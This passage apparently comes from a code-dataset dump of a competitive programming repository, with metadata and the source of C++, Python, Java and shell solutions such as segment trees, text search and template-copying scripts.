};\n\n while (order.size())\n {\n auto [_, u] = *order.begin();\n //writeln(\"GO\", u + 1);\n eraseVertex(u);\n auto [v, __] = up[u];\n if (v == -1)\n return writeln(-1);\n if (g[v].size() == 1)\n return writeln(-1);\n if (g[v].size() >= 4)\n return writeln(-1);\n eraseVertex(v);\n int downVertex = -1;\n int downEdge = -1;\n for (auto& [dv, de]: g[v])\n if (dv != u && dv != up[v].first)\n downVertex = dv,\n downEdge = de;\n if (downVertex != -1)\n {\n eraseVertex(downVertex);\n //writeln(\"ERASE CHILD\", u + 1, v + 1, downVertex + 1); cout.flush();\n if (up[v].first != -1)\n eraseEdge(v, up[v].first, up[v].second);\n }\n 
else\n {\n //writeln(\"ERASE ROOT\", u + 1, v + 1, up[v].first + 1); cout.flush();\n u = v;\n v = up[v].first;\n if (v == -1)\n return writeln(-1);\n eraseVertex(v);\n auto ccc(g[v]);\n for (auto& [dv, de]: ccc)\n if (dv != u)\n eraseEdge(v, dv, de);\n //writeln(\"ERASED ROOT\", u + 1, v + 1, up[v].first + 1); cout.flush();\n }\n }\n writeln(ans.size());\n writeln(ans);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false); cin.tie(0);\n ints(t); fori(t) run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.4457831382751465, "alphanum_fraction": 0.4939759075641632, "avg_line_length": 40, "blob_id": "fbd25ea62191fe5a12f9391fadba040dea9e22c0", "content_id": "e2fdc6e157932f3549adbca56fe54a2e0f7c0180", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 83, "license_type": "no_license", "max_line_length": 64, "num_lines": 2, "path": "/CodeForce/0952/G.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "y='..\\nX.\\n..\\n'\nprint(''.join(y*(255-ord(x))+'X.\\n'*2+y*ord(x)for x in input()))\n\n" }, { "alpha_fraction": 
0.4966442883014679, "alphanum_fraction": 0.5302013158798218, "avg_line_length": 48.66666793823242, "blob_id": "17830eeb8a0a0cd8f659326757063e04b799a72b", "content_id": "25cd71207496df4296268dc7ab50f7142afd1200", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 149, "license_type": "no_license", "max_line_length": 67, "num_lines": 3, "path": "/CodeForce/0534/B.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "v1, v2 = list(map(int, input().split()))\nt, d = list(map(int, input().split()))\nprint(sum(min(v1 + d * i, v2 + d * (t - i - 1)) for i in range(t)))\n" }, { "alpha_fraction": 0.5388429760932922, "alphanum_fraction": 0.5462809801101685, "avg_line_length": 27.13953399658203, "blob_id": "a77f2d3d9eaee18452aa0069911de975f8c4364a", "content_id": "70ad7bf2a3c77fd9d6e9210c9aa22472e543b93f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1210, "license_type": "no_license", "max_line_length": 97, "num_lines": 43, "path": "/CodeForce/gym/101585/G.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import re\n\ndef trimSpaces(ss):\n return re.sub('^\\s*(.*?)\\s*$', r'\\1', ss)\n\ndef filterEmpty(l):\n return list(filter(lambda x: len(x) != 0, l))\n\ntext = input()\nq = int(input())\n\nsequences = re.sub(r'\\.(\\s*?[A-Z0-9.!?])', r'.#\\1', text);\nsequences = re.sub(r'\\.(\\s*?[A-Z0-9.!?])', r'.#\\1', sequences);\n# print(sequences)\nsequences = re.sub('([!?])', r'\\1#', sequences)\nsequences = sequences.split('#')\nsequences = filterEmpty(sequences)\nsequencesLower = list(map(lambda x: filterEmpty(re.split('[.!? 
]', x.lower())), sequences))\n# print(sequences)\n\n\n\ndef connn(what):\n ret = []\n for i in range(len(sequencesLower)):\n ok = True\n for j in range(len(what)):\n #print('SEARCHING %s in %s %s' % (what[j], sequences[i], sequences[i].find(what[j])))\n if not what[j] in sequencesLower[i]:\n ok = False\n break\n if ok:\n ret.append(sequences[i])\n return ret\n\nfor i in range(q):\n ss = input()\n search = filterEmpty(re.split('\\s', ss.lower()))\n results = connn(search)\n\n print('Search results for \"%s\":' % ss)\n if len(results):\n print(\"- %s\" % \"\\n- \".join(map(lambda x: '\"%s\"' % (trimSpaces(x)), results)))\n" }, { "alpha_fraction": 0.432218462228775, "alphanum_fraction": 0.4511229693889618, "avg_line_length": 27.00452423095703, "blob_id": "a0ed8ee91a2126658dd0e65981c94a8a4fce2a3d", "content_id": "8e9369be97a2638c6ca1d0ddc0f9d3b60c09ed45", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6189, "license_type": "no_license", "max_line_length": 173, "num_lines": 221, "path": "/CodeForce/1531/D.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) 
int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//}}}\n\n//segmentTree\n//0-indexed, [l..r]\ntemplate<typename T>\nstruct segmentTree\n{\n int n;\n vector<T> t;\n vector<T> add;\n vector<T> pos;\n \n void build(const vector<T>& a, int v, int l, int r)\n {\n if (l == r)\n t[v] = a[l],\n pos[v] = l;\n else \n {\n int m = (l + r) / 2;\n build(a, v * 2, l, m);\n build(a, v * 2 + 1, m + 1, r);\n T left = t[v * 2];\n T right = t[v * 2 + 1];\n\n if (left > right)\n pos[v] = pos[v * 2];\n else\n pos[v] = pos[v * 2 + 1];\n t[v] = max(left, right);\n }\n };\n \n segmentTree(const vector<T>& a)\n {\n n = a.size();\n t.resize(n * 4 + 10);\n add.resize(n * 4 + 10, 0);\n pos.resize(n * 4 + 10, 0);\n build(a, 1, 0, n - 1);\n }\n \n void update(int l, int r, T value)\n {\n //writeln(\"ADDING\", l, r, value);\n update(1, 0, n - 1, l, r, value);\n }\n \n void update(int v, int tl, int tr, int l, int r, T value) \n {\n if (add[v] != 0)\n {\n t[v] += add[v];\n if (tl != tr)\n add[v * 2] += add[v],\n add[v * 2 + 1] += add[v];\n add[v] = 0;\n }\n if (l > r)\n return;\n if (tl == l && tr == r)\n {\n t[v] += value;\n if (tl != tr)\n add[v * 2] += value,\n add[v * 2 + 1] += value;\n }\n else \n {\n int tm = (tl + tr) / 2;\n update(v * 2, tl, tm, l, min(r, tm), value);\n update(v * 2 + 1, tm + 1, tr, max(l, tm + 1), r, value);\n T left = t[v * 2];\n T right = t[v * 2 + 1];\n\n if (left > right)\n pos[v] = pos[v * 2];\n else\n pos[v] = pos[v * 2 + 1];\n t[v] = max(left, right);\n }\n }\n};\n\nvoid run()\n{\n ints(n);\n 
vector<string> s(n);\n readln(s);\n s.insert(s.begin(), \"blue\");\n s.pb(\"lock\");\n s.pb(\"unlock\");\n s.pb(\"lock\");\n s.pb(\"unlock\");\n n = SZ(s);\n ints(q);\n\n set<int> locks, unlocks;\n vector<int> a(n, 0);\n segmentTree<int> tree(a);\n\n auto addString = [&](int i) {\n if (s[i] == \"lock\")\n locks.insert(i);\n else if (s[i] == \"unlock\")\n unlocks.insert(i);\n };\n auto getUnlock = [&](int l) {\n return min(*unlocks.lower_bound(l), *locks.upper_bound(l));\n };\n auto updatePos = [&](int i, int diff, bool rec) {\n auto l = locks.upper_bound(i);\n if (l != locks.begin())\n {\n --l;\n int u = getUnlock(*l);\n if (u < i) return;\n tree.update(*l, u, diff);\n if (l != locks.begin() && rec)\n {\n --l;\n int u = getUnlock(*l);\n if (u < i) return;\n tree.update(*l, u, diff);\n }\n }\n };\n fori(n)\n addString(i);\n\n for (int u: unlocks)\n tree.update(u, u, -1);\n for (int l: locks)\n {\n tree.update(l, l, -1);\n int u = getUnlock(l);\n tree.update(l, u, -1);\n }\n writeln(s[tree.pos[1]]);\n\n forn(w, q)\n {\n int i;\n string t;\n readln(i, t);\n //writeln(s);\n if (s[i] != t)\n {\n if (s[i] == \"unlock\" || s[i] == \"lock\")\n tree.update(i, i, 1),\n updatePos(i, 1, s[i] == \"lock\"),\n (s[i] == \"lock\" ? locks : unlocks).erase(i),\n updatePos(i, -1, false);\n\n s[i] = t;\n\n if (s[i] == \"lock\" || s[i] == \"unlock\")\n updatePos(i, 1, false),\n (s[i] == \"lock\" ? 
locks : unlocks).insert(i),\n updatePos(i, -1, s[i] == \"lock\"),\n tree.update(i, i, -1);\n }\n //writeln(s);\n writeln(s[tree.pos[1]]);\n //writeln();\n }\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\" \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.2744479477405548, "alphanum_fraction": 0.27917981147766113, "avg_line_length": 15.6578950881958, "blob_id": "94161831f4f3fdd6b2782b4cd8e7f8f0e4430198", "content_id": "27fe355e5857f2bdd960941949a45f78661f86b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 680, "license_type": "no_license", "max_line_length": 32, "num_lines": 38, "path": "/2023/tin/2.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "\n# python 3.10\n\nm = {\n 'РҐ': 'Х',\n 'Рѕ': 'а',\n 'С‰': 'к',\n 'Сѓ': 'е',\n 'СЏ': 'р',\n 'СЋ': 'п',\n 'СЉ': 'л',\n 'РЅ': 'я',\n 'Р¶': 'ш',\n 'Р±': 'т',\n 'С‘': 'ч',\n 'С€': 'й',\n 'СЊ': 'н',\n 'С‡': 'и'\n}\n\ndef decrypt(text: str) -> str:\n l = len(text)\n ret = ''\n p = ''\n for i in range(l):\n c = text[i]\n if c in [' ', ',', '.']:\n ret += c\n 
else:\n if p == '':\n p = c\n else:\n ret += m[p + c]\n p = ''\n return ret\n\nif __name__ == \"__main__\":\n input_str = input()\n print(decrypt(input_str))\n" }, { "alpha_fraction": 0.5223880410194397, "alphanum_fraction": 0.5223880410194397, "avg_line_length": 12, "blob_id": "df1dba4810ddeb404a1f3f80e63da6b8161d0b1d", "content_id": "fbe50dd5f1e4f3081d1440d6500fd61ad898c83e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 67, "license_type": "no_license", "max_line_length": 12, "num_lines": 5, "path": "/CodeForce/clear.sh", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "mv E/E.cpp .\nmv D/D.cpp .\nmv C/C.cpp .\nmv B/B.cpp .\nmv A/A.cpp .\n\n\n" }, { "alpha_fraction": 0.3454987704753876, "alphanum_fraction": 0.3540146052837372, "avg_line_length": 19.073171615600586, "blob_id": "1e9e7b6c4fc9725e438627cd19645975b823f8a0", "content_id": "e6478947d0f6931eb2d2e548c517ac676afb7e50", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 822, "license_type": "no_license", "max_line_length": 54, "num_lines": 41, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.10.25/I.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n \n#define fori(n) for (int i = 0; i < n; ++i)\n#define fori1(n) for (int i = 1; i < n; ++i)\n#define forj(n) for (int j = 0; j < n; ++j)\n \n#define fst first\n#define snd second\n#define pb push_back\n \nusing namespace std;\n \nint main()\n{\n //freopen(\"in.c\", \"r\", stdin);\n int n, m;\n while (true)\n {\n cin >> n >> m;\n if (n + m == 0)\n return 0;\n vector<pair<int, int> > a;\n int x, y;\n fori(n)\n {\n cin >> x >> y;\n cin >> x >> y;\n a.pb({x, x + y});\n }\n fori(m)\n {\n cin >> x >> y;\n y += x;\n int ans = 0;\n fori(n)\n if (!(a[i].fst >= y || a[i].snd <= x))\n ans++;\n cout << ans << \"\\n\";\n }\n }\n}" }, { "alpha_fraction": 0.5063807964324951, "alphanum_fraction": 
0.5165901184082031, "avg_line_length": 31.649999618530273, "blob_id": "de76b5a1ef4d8b859aaf0fb7c899ccff8547d367", "content_id": "8c78ccbd83ac7a78cf398e7995e9bc28fddd8583", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1959, "license_type": "no_license", "max_line_length": 928, "num_lines": 60, "path": "/trains/neerc/neerc.ifmo.ru.train.2013.09.24/H.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#include <map>\n#include <queue>\n#define enter printf(\"\\n\");\n#define pb push_back\n\nusing namespace std;\nint INF = 1000000007;\nvector< vector<int> > a;\nvector<int> used;\nstring FILENAME = \"dragon\";\nstring FILEINPUT = FILENAME;\n\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nvoid readln(vector<int> &f, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n read(x);\n f.push_back(x);\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n for (int i = 0; i < f.size(); 
i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');\n}\n\nvoid run()\n{\n int n, d;\n readln(n, d);\n int k = 0, m = d;\n while (m > 0)\n k++,\n m /= 10;\n if (k > n)\n printf(\"No solution\\n\"); else\n {\n write(d);\n for (int i = 0; i < n - k; i++)\n printf(\"0\");\n }\n}\n\nint main()\n{\n freopen(FILEINPUT.append(\".in\").c_str(), \"r\", stdin);\n freopen(FILENAME.append(\".out\").c_str(), \"w\", stdout);\n run();\n return 0;\n}\n" }, { "alpha_fraction": 0.3315926790237427, "alphanum_fraction": 0.3864229619503021, "avg_line_length": 18.100000381469727, "blob_id": "3bcd75cb1becc6eb2498e49d9530560d43ebc68e", "content_id": "c12dc99c4e771a8a6564e6c372ce5af1d39d4645", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 383, "license_type": "no_license", "max_line_length": 39, "num_lines": 20, "path": "/CodeForce/0411/allLanguages/python2.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\na = raw_input()\nok = 0\nok1 = 0\nok2 = 0\nok3 = 0\na = list(a)\nif (len(a) >= 5):\n ok = 1\nfor i in range(len(a)):\n if ((a[i] >= 'a') & (a[i] <= 'z')):\n ok1 = 1\n if ((a[i] >= 'A') & (a[i] <= 'Z')):\n ok2 = 1\n if ((a[i] >= '0') & (a[i] <= '9')):\n ok3 = 1\nif (ok + ok1 + ok2 + ok3 == 4):\n print \"Correct\"\nelse:\n print \"Too weak\" \n" }, { "alpha_fraction": 0.29443690180778503, "alphanum_fraction": 0.3043871521949768, "avg_line_length": 17.40350914001465, "blob_id": "29e2cc265f5108291bd97d6b483ee9d939a24675", "content_id": "8ca5690fae5f83cc062d69c3e5fc9433a66773d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2938, "license_type": "no_license", "max_line_length": 60, "num_lines": 114, "path": "/trains/neerc/neerc.ifmo.ru.train.2015.10.20/G.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <iostream>\r\n#include <cstdio>\r\n#include <bits/stdc++.h>\r\n \r\nusing namespace std;\r\n 
\r\nint main()\r\n{\r\n    int n, m, k = 10001;\r\n    scanf(\"%d\", &n);\r\n \r\n    vector<pair<int,int>> g;\r\n \r\n    for (int i = 0; i < n; i++)\r\n    {\r\n        int x, y;\r\n        scanf(\"%d%d\", &x, &y);\r\n        g.push_back({x, y});\r\n    }\r\n \r\n \r\n    vector<vector<pair<double, double>>> s(k);\r\n    vector<vector<pair<double, double>>> t(k);\r\n \r\n    double eps = 1e-9;\r\n    scanf(\"%d\", &m);\r\n \r\n    for (int i = 0; i < m; i++)\r\n    {\r\n        int x, y, r;\r\n        scanf(\"%d%d%d\", &x, &y, &r);\r\n \r\n        int u = min(y + r, k - 1);\r\n        int d = max(y - r, 0);\r\n \r\n        for (int j = d; j <= u; j++)\r\n        {\r\n            int dy = j - y;\r\n            double dr = sqrt(r * r - dy * dy) + eps;\r\n            s[j].push_back({x - dr, x + dr});\r\n        }\r\n    }\r\n    for (int y = 0; y < k; y++)\r\n    {\r\n        sort(s[y].begin(), s[y].end());\r\n \r\n        double curL = -2, curR = -1;\r\n \r\n        for (auto &seg : s[y])\r\n        {\r\n            if (curR < seg.first)\r\n            {\r\n                t[y].push_back({curL, curR});\r\n                curL = seg.first;\r\n                curR = seg.second;\r\n            }\r\n            else\r\n            {\r\n                curR = max(curR, seg.second);\r\n            }\r\n        }\r\n        t[y].push_back({curL, curR});\r\n    }\r\n \r\n    int ans = n;\r\n    for (int i = 0; i < n; i++)\r\n    {\r\n        int x = g[i].first, y = g[i].second;\r\n        int len = t[y].size();\r\n        int l = 0, r = len - 1;\r\n \r\n        while (r - l > 1)\r\n        {\r\n            int mid = (r + l) / 2;\r\n \r\n            if (t[y][mid].first < x)\r\n            {\r\n                l = mid;\r\n            }\r\n            else\r\n            {\r\n                r = mid;\r\n            }\r\n        }\r\n \r\n \r\n        l -= 2;\r\n        r += 2;\r\n \r\n        bool ok = false;\r\n \r\n        for (int j = l; j <= r; j++)\r\n        {\r\n       
     if (0 <= j && j < len)\r\n            {\r\n                pair<double, double> seg = t[y][j];\r\n                ok |= (seg.first <= x) && (x <= seg.second);\r\n            }\r\n \r\n        }\r\n \r\n        if (ok)\r\n        {\r\n            --ans;\r\n        }\r\n \r\n    }\r\n \r\n \r\n \r\n \r\n \r\n    printf(\"%d\\n\", ans);\r\n}\n" }, { "alpha_fraction": 0.6057906746864319, "alphanum_fraction": 0.62806236743927, "avg_line_length": 25.212121963500977, "blob_id": "7042dfc4496e699bcbcdbcba0a28612ad8fca7c0", "content_id": "17da4f89adc0d890fd7e3f831955eec00822db62", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 898, "license_type": "no_license", "max_line_length": 77, "num_lines": 33, "path": "/study/task7/SimViz.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "package task7;\r\n\r\nimport java.awt.image.BufferedImage;\r\n\r\nimport javax.swing.ImageIcon;\r\nimport javax.swing.JFrame;\r\nimport javax.swing.JLabel;\r\nimport javax.swing.JPanel;\r\n\r\npublic class SimViz extends JFrame {\r\n\tpublic SimViz(int scale, Digit digit) {\r\n\t\tint m = scale * digit.len;\r\n\t\tBufferedImage canvas = new BufferedImage(m, m, BufferedImage.TYPE_INT_RGB);\r\n\t\tJLabel label = new JLabel();\r\n\t\tlabel.setIcon(new ImageIcon(canvas));\r\n\t\tJPanel mainPanel = new JPanel();\r\n\t\tmainPanel.add(label);\r\n\t\tadd(mainPanel);\r\n\t\tsetBounds(42, 42, m + 42, m + 42);\r\n\t\tfor (int y = 0; y < m; y++) {\r\n\t\t\tfor (int x = 0; x < m; x++) {\r\n\t\t\t\tint grey = (int) Math.round(digit.getSignal(x / scale, y / scale) * 255);\r\n\t\t\t\tcanvas.setRGB(x, y, (grey << 16) | (grey << 8) | (grey << 0));\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tsetTitle(\"Digit = \" + digit.label);\r\n\r\n\t\trepaint();\r\n\t}\r\n\r\n\tprivate static final long serialVersionUID = 10L;\r\n}\r\n" }, { "alpha_fraction": 0.635869562625885, "alphanum_fraction": 0.72826087474823, "avg_line_length": 25.285715103149414, 
"blob_id": "9c59acbab35370c85a13a71681fcf731a5d29d7f", "content_id": "0fbebe6bd6bbe2b5895aec37fdcd19d631943365", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 184, "license_type": "no_license", "max_line_length": 32, "num_lines": 7, "path": "/staff/makeCfRound.sh", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "mkdir \"$1\"\ncd \"$1\"\ncp $HOME/206round/main.cpp E.cpp\ncp $HOME/206round/main.cpp D.cpp\ncp $HOME/206round/main.cpp C.cpp\ncp $HOME/206round/main.cpp B.cpp\ncp $HOME/206round/main.cpp A.cpp\n" }, { "alpha_fraction": 0.33933934569358826, "alphanum_fraction": 0.3588588535785675, "avg_line_length": 16.5, "blob_id": "1ae50607f0a821ab9b0c747131a881781fd83146", "content_id": "c7439442e0dbfb1e738f2281af7404a71c5c7bbb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 666, "license_type": "no_license", "max_line_length": 27, "num_lines": 38, "path": "/CodeForce/0723/B.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n = input()\ns = input() + '_'\n\ninbrackets = False\nl = 0\nc = 0\n\nlength = len(s)\n\ncur = 0\nfor i in range(length):\n if s[i] == '_':\n if not inbrackets:\n l = max(l, cur)\n else:\n if cur > 0:\n c += 1\n cur = 0\n elif s[i] == '(':\n if not inbrackets:\n l = max(l, cur)\n else:\n if cur > 0:\n c += 1\n inbrackets = True\n cur = 0\n elif s[i] == ')':\n if not inbrackets:\n l = max(l, cur)\n else:\n if cur > 0:\n c += 1\n inbrackets = False\n cur = 0\n else:\n cur += 1\n\nprint(l, c)\n\n" }, { "alpha_fraction": 0.3956931233406067, "alphanum_fraction": 0.4578286111354828, "avg_line_length": 22.463157653808594, "blob_id": "d4e4132fdde6a00eaf33f1d731d7257e37d543c6", "content_id": "21934ac8393868102bd00b2aee59921e8555e6bf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4458, "license_type": "no_license", "max_line_length": 843, "num_lines": 
190, "path": "/CodeForce/0417/E.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n\n#define enter printf(\"\\n\")\n#define pb push_back\n#define ll long long\n#define fors(it, r) for (set<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forvit(it, r) for (vector<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forv(i, vector) for (int i = 0; i < vector.size(); i++)\n#define forn(i, n) for (int i = 0; i < n; i++)\n#define forn1(i, n) for (int i = 1; i < n; i++)\n#define fori(n) for (int i = 0; i < n; i++)\n#define forj(n) for (int j = 0; j < n; j++)\n#define vi vector<int>\n#define vll vector<long long>\n#define pii pair<int, int>\n\nusing namespace std;\nint INF = 1000000007;\nstring FILENAME = \"input\";\nstring FILEINPUT = FILENAME;\n\nvoid writeln(int a);void writeln(int a, int b); void writeln(int a, int b, int c); void writeln(int a, int b, int c, int d); void writeln(vector<int>& a);\nvoid readln(int& a);void readln(int& a, int& b);void readln(int& a, int& b, int& c);void readln(int& a, int& b, int& c, int& d);void readln(vector<int>& a, int n);\n\nstruct graph\n{\n vector<vector<int>> edges;\n int n;\n graph(int n);\n graph(int n, int m);\n graph();\n void createGraph(int n);\n void add_edge(int u, int v);\n void add_or_edge(int u, int v);\n void writelnMatrix();\n void writeln();\n};\n\nint n, m, k;\nvector<vi> a = {{1, 0}, {4, 1}, {6, 1}, {1, 0}, {2, 1}, {2, 5}, {6, 1}, {1, 1}, {1, 0}, {6, 5}, {2, 1}, {1, 3}, {6, 1}, {2, 5}, {2, 8}, {1, 0}, {1, 1}, {4, 9}, {2, 1}, {1, 2}, {2, 12}, {4, 4}, {4, 1}, {1, 5}, {1, 0}, {2, 8}, {6, 9}, {1, 1}, {2, 1}, {2, 21}, {2, 4}, {1, 4}, {1, 2}, {2, 12}, {2, 17}, {1, 0}, {4, 9}, {14, 29}, {2, 8}, {1, 3}, {1, 1}, {4, 33}, {4, 9}, {1, 7}, {2, 9}, {2, 21}, {14, 1}, {1, 2}, {1, 0}, {2, 5}, {2, 17}, {1, 6}, {4, 1}, {2, 8}, {2, 1}, {1, 1}, {1, 3}, {4, 4}, {2, 4}, {1, 5}, {2, 9}, {16, 1}, {4, 32}, {1, 0}, {1, 2}, {2, 5}, {4, 33}, {1, 4}, {2, 17}, {2, 24}, {2, 1}, 
{1, 9}, {1, 1}, {2, 13}, {2, 20}, {1, 3}, {4, 1}, {4, 32}, {2, 9}, {1, 8}, {1, 0}, {6, 13}, {40, 25}, {1, 2}, {2, 12}, {2, 28}, {6, 8}, {1, 7}, {1, 4}, {2, 8}, {2, 24}, {1, 1}, {4, 17}, {2, 13}, {2, 4}, {1, 6}, {1, 3}, {4, 49}, {2, 9}, {1, 0}};\nvoid writeln(vector<vi>& a)\n{\n fori(a.size())\n writeln(a[i]);\n}\n\nbool check(int i)\n{\n return sqrt(i) - (int) sqrt(i) == 0;\n}\n\nvoid run()\n{\n //readln(n, m);\n //n = 1;\n //a.resize(n);\n int c = 100, count=0;\n int x = 3;\n for(int m = 1; m <= 100; m++)\n for(int n = 1, f=1; n <= 100; n++, f=1)\n for(int y = 1; y <= c && f; y++)\n if (check(a[n-1][0]*a[n-1][0]*a[n-1][1] + y*y*(n-a[n-1][1])))\n f=0,\n count++;\n cout << count << endl;\n\n}\n\nint main()\n{\n //freopen(FILEINPUT.append(\".in\").c_str(), \"r\", stdin);\n //freopen(FILENAME.append(\".out\").c_str(), \"w\", stdout);\n run();\n return 0;\n}\n\ngraph::graph(int n)\n{\n this->n = n;\n edges.resize(n);\n int t;\n fori(n)\n {\n edges[i].resize(n);\n forj(n)\n readln(t),\n edges[i][j] = t == '1';\n }\n}\n\ngraph::graph(int n, int m)\n{\n this->n = n;\n edges.resize(n);\n int u, v;\n fori(m)\n readln(u, v),\n add_edge(u - 1, v - 1);\n}\n\nvoid graph::add_edge(int u, int v)\n{\n edges[u].pb(v);\n}\n\nvoid graph::add_or_edge(int u, int v)\n{\n edges[u].pb(v);\n edges[v].pb(u);\n}\n\ngraph::graph(){};\n\nvoid graph::createGraph(int n)\n{\n edges.resize(n);\n}\n\nvoid graph::writeln()\n{\n fori(n)\n forj(edges[i].size())\n ::writeln(i, edges[i][j]);\n}\n\nvoid graph::writelnMatrix()\n{\n fori(n)\n {\n forj(n)\n printf(\"%d \", edges[i][j]);\n 